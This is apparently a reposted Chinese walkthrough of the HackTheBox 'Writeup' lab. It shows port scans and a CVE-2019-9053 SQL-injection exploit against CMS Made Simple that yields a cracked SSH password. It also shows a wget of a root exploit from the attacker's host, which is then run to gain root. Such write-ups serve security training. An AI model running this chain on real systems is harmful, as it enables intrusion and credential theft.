HackTheBox-Writeup

admin 2023年2月15日13:08:55评论178 views字数 6931阅读23分6秒阅读模式

title: HackTheBox-Writeup author: Crazyinside layout: true categories: HackTheBox cover: https://www.worldisend.com/img/Writeup.png tags:

LInux


HackTheBox-Writeup
Crazy:~/HackThebox/Writeup$ sudo masscan -p1-65535,U:1-65535 --rate 2000 -e tun0 10.10.10.138[sudo] crazyinside 的密码:Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-08-22 01:11:31 GMTInitiating SYN Stealth ScanScanning 1 hosts [131070 ports/host]Discovered open port 22/tcp on 10.10.10.138                                    Discovered open port 80/tcp on 10.10.10.138   Crazy:~/HackThebox/Writeup$ sudo nmap -sC -sV 10.10.10.138 -p22,80 -oN Writeup                             [sudo] crazyinside 的密码:Starting Nmap 7.92SVN ( https://ParrotOS.org ) at 2022-08-22 09:13 CSTNmap scan report for 10.10.10.138Host is up (0.20s latency).
PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)| ssh-hostkey: | 2048 dd5310700bd0470ae27e4ab6429823c7 (RSA)| 256 372e1468aeb9c2342b6ed992bcbfbd28 (ECDSA)|_ 256 93eaa84042c1a83385b35600621ca0ab (ED25519)80/tcp open http Apache httpd 2.4.25 ((Debian))| http-robots.txt: 1 disallowed entry |_/writeup/|_http-title: Nothing here yet.Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://ParrotOS.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 12.77 secondszsh: segmentation fault sudo nmap -sC -sV 10.10.10.138 -p22,80 -oN Writeup
HackTheBox-Writeup
image-20220822092101614
Crazy:~/HackThebox/Writeup$ curl http://10.10.10.138/robots.txt#              __#      _(    |@@|#     (__/__ --/ __#        ___|----|  |   __#             }{ / )_ / _#            /__/ __O (__#           (--/--)    __/#           _)(  )(_#          `---''---`
# Disallow access to the blog until content is finished.User-agent: * Disallow: /writeup/ Crazy:~/HackThebox/Writeup$
HackTheBox-Writeup
image-20220822092221818
Crazy:~/HackThebox/Writeup$ whatweb http://10.10.10.138/writeup/     http://10.10.10.138/writeup/ [200 OK] Apache[2.4.25], CMS-Made-Simple, Cookies[CMSSESSID9d372ef93962], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], IP[10.10.10.138], MetaGenerator[CMS Made Simple - Copyright (C) 2004-2019. All rights reserved.], Title[Home - writeup]

没有更多的版本信息。

Crazy:~/HackThebox/Writeup$ searchsploit CMS Made Simple------------------------------------------------------------------------------------------------------ --------------------------------- Exploit Title                                                                                        |  Path------------------------------------------------------------------------------------------------------ ---------------------------------CMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code Execution (Metasploit)                    | php/remote/46627.rbCMS Made Simple 0.10 - 'index.php' Cross-Site Scripting                                               | php/webapps/26298.txtCMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion                                               | php/webapps/26217.htmlCMS Made Simple 1.0.2 - 'SearchInput' Cross-Site Scripting                                            | php/webapps/29272.txtCMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection                                                | php/webapps/29941.txtCMS Made Simple 1.11.10 - Multiple Cross-Site Scripting Vulnerabilities                               | php/webapps/32668.txtCMS Made Simple 1.11.9 - Multiple Vulnerabilities                                                     | php/webapps/43889.txtCMS Made Simple 1.2 - Remote Code Execution                                                           | php/webapps/4442.txtCMS Made Simple 1.2.2 Module TinyMCE - SQL Injection                                                  | php/webapps/4810.txtCMS Made Simple 1.2.4 Module FileManager - Arbitrary File Upload                                      | php/webapps/5600.phpCMS Made Simple 1.4.1 - Local File Inclusion                                                          | php/webapps/7285.txtCMS Made Simple 1.6.2 - Local File Disclosure                                                         | php/webapps/9407.txtCMS Made Simple 1.6.6 - Local File Inclusion / Cross-Site Scripting                                   | php/webapps/33643.txtCMS Made Simple 1.6.6 - Multiple Vulnerabilities                                                      | php/webapps/11424.txtCMS Made Simple 1.7 - Cross-Site Request Forgery                                                      | php/webapps/12009.htmlCMS Made Simple 1.8 - 'default_cms_lang' Local File Inclusion                                         | php/webapps/34299.pyCMS Made Simple 1.x - Cross-Site Scripting / Cross-Site Request Forgery                               | php/webapps/34068.htmlCMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template Injection                        | php/webapps/48944.pyCMS Made Simple 2.1.6 - Multiple Vulnerabilities                                                      | php/webapps/41997.txtCMS Made Simple 2.1.6 - Remote Code Execution                                                         | php/webapps/44192.txtCMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated)                                        | php/webapps/48779.pyCMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload                                          | php/webapps/48742.txtCMS Made Simple 2.2.14 - Persistent Cross-Site Scripting (Authenticated)                              | php/webapps/48851.txtCMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS)                                           | php/webapps/49793.txtCMS Made Simple 2.2.15 - RCE (Authenticated)                                                          | php/webapps/49345.txtCMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authenticated)              | php/webapps/49199.txtCMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution                                         | php/webapps/44976.pyCMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution                                         | php/webapps/45793.pyCMS Made Simple < 1.12.1 / < 2.1.3 - Web Server Cache Poisoning                                       | php/webapps/39760.txtCMS Made Simple < 2.2.10 - SQL Injection                                                              | php/webapps/46635.pyCMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File Upload                                      | php/webapps/34300.pyCMS Made Simple Module Download Manager 1.4.1 - Arbitrary File Upload                                 | php/webapps/34298.pyCMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload                        | php/webapps/46546.py------------------------------------------------------------------------------------------------------ ---------------------------------Shellcodes: No Results------------------------------------------------------------------------------------------------------ --------------------------------- Paper Title                                                                                          |  Path------------------------------------------------------------------------------------------------------ ---------------------------------CMS Made Simple v2.2.13 - Paper                                                                       | docs/english/49947-cms-made-simp------------------------------------------------------------------------------------------------------ ---------------------------------                                                                                               

漏洞编号为CVE-2019-9053.自带的脚本是python2的,无法进行使用,Github上有一个python3版本的:

https://github.com/4nner/CVE-2019-9053/blob/master/exploit.py
./exploit.py -u http://10.10.10.138/writeup --crack --wordlist /usr/share/wordlists/rockyou.txt
[+] Salt for password found: 5a599ef579066807[+] Username found: jkr[+] Email found: jkr@writeup.htb[+] Password found: 62def4866937f08cc13bab43bb14e6f7[+] Password cracked: raykayjay9
Crazy:~/HackThebox/Writeup$ ssh jkr@writeup.htb                    jkr@writeup.htb's password: Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux
The programs included with the Devuan GNU/Linux system are free software;the exact distribution terms for each program are described in theindividual files in /usr/share/doc/*/copyright.
Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extentpermitted by applicable law.Last login: Sun Aug 21 21:49:32 2022 from 10.10.16.5jkr@writeup:~$ sudo -l-bash: sudo: command not foundjkr@writeup:~$ cat user.txt fe...................................jkr@writeup:~$ jkr@writeup:~$ wget http://10.10.16.3/pwk.py--2022-08-21 21:51:50-- http://10.10.16.3/pwk.pyConnecting to 10.10.16.3:80... connected.HTTP request sent, awaiting response... 200 OKLength: 3448 (3.4K) [text/x-python]Saving to: pwk.py
pwk.py 100%[=============================================================>] 3.37K --.-KB/s in 0.01s
2022-08-21 21:51:51 (236 KB/s) - pwk.py saved [3448/3448]
jkr@writeup:~$ lspwk.py sharedvuln user.txtjkr@writeup:~$ python pwk.py File "pwk.py", line 43 cargv = (c_char_p * (len(argv) + 1))(*argv, None)SyntaxError: only named arguments may follow *expressionjkr@writeup:~$ python3 pwk.py # iduid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev),1000(jkr)# cat /root/root.txtbf84..............................#

原文始发于微信公众号(老鑫安全):HackTheBox-Writeup

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年2月15日13:08:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HackTheBox-Writeuphttps://cn-sec.com/archives/1282470.html

发表评论

匿名网友 填写信息